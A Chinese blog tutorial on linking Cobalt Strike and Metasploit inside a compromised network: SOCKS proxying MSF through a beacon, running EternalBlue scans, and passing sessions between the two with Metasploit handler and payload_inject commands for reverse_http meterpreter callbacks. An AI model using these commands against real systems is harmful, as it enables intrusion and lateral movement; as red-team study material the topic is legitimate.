CobaltStrike和Metasploit相互联动

文章介绍了如何利用CobaltStrike的socks代理将Metasploit带入目标内网执行操作,包括两种方法:一种是通过本地MSF设置代理,另一种是通过CS的ForeignHTTP监听器转发流量。这两种方法都涉及内网信息搜集和漏洞利用的协同工作。
摘要由CSDN通过智能技术生成

CobaltStrike联动Metasploit

CobaltStrike (简称CS)及 MetaSploit (简称MSF)各有所长,CS更适合作为 稳控平台,MSF更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。

方法一

通过CS内置socks代理将本地MSF带入目标内网执行操作

思路:利用 beacon shell 在目标机器和团队服务器之间建立 socks , 而后再在本地利用通过 proxychains 之类的工具连到目标内网即可。

假设在cs上已经拿到了一台beacon。

1.CS 启动 Socks 代理

请添加图片描述

2.使用 proxychains 代理
另一台vps编辑 /etc/proxychains.conf 文件,添加 TeamServer 服务器 ip 和 socks 端口,就可以直接连到目标内网。

请添加图片描述

在目标机器上开启http.server的服务去验证是否挂代理成功。

成功代理访问到主机的页面。

请添加图片描述

3.MSF设置代理

让本地 MSF 所有模块的流量都从 CS 的 socks5 代理走

代理信息 > tunnel > 得到设置代理命令>隧道

请添加图片描述
请添加图片描述

然后在另一台的vps上开启Msf,把刚刚那个命令复制上去,然后执行永恒之蓝的探测模块进行攻击。

请添加图片描述
请添加图片描述

方法二(推荐)

1.CS 上创建一个 http 的外部监听器( Foreign HTTP )

请添加图片描述

2.在msf上开启监听。

use exploit/multi/handler 
set payload windows/meterpreter/reverse_http 
set lhost (内部ip) 
set lport 803
run -j

3.在cs上直接spawn for-http 直接把流量转到msf中,获得会话的权限。

请添加图片描述

注意:如果在msf中监听的端口提示被占用,那就监听新的端口,同时在cs上修改为msf监听的新端口,msf就可以成功执行监听。

Metasploit联动CobaltStrike

假设已经在msf中得到它的一个会话了。

1.在 CS 开启一个监听(Beacon HTTP)就平常的http的反向连接的会话就行。

2.MSF 上执行 payload 注入模块

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set DisablePayloadHandler true 
set lhost ip                #cobaltstrike监听的ip 
set lport 801               #cobaltstrike监听的端口 
set session 2               #这里是获得的session的id run

DisablePayloadHandler 默认为 false ,即 payload_inject 模块执行之后会在 本地生成一个新的 handler 监听器,由于设置执行的 payload 是去连接 Cobaltstrike 的监听器,所以这里我们设置为 true ,让它不再生成新的 handler 监听器。

3.注入成功,成功上线。

请添加图片描述

请添加图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值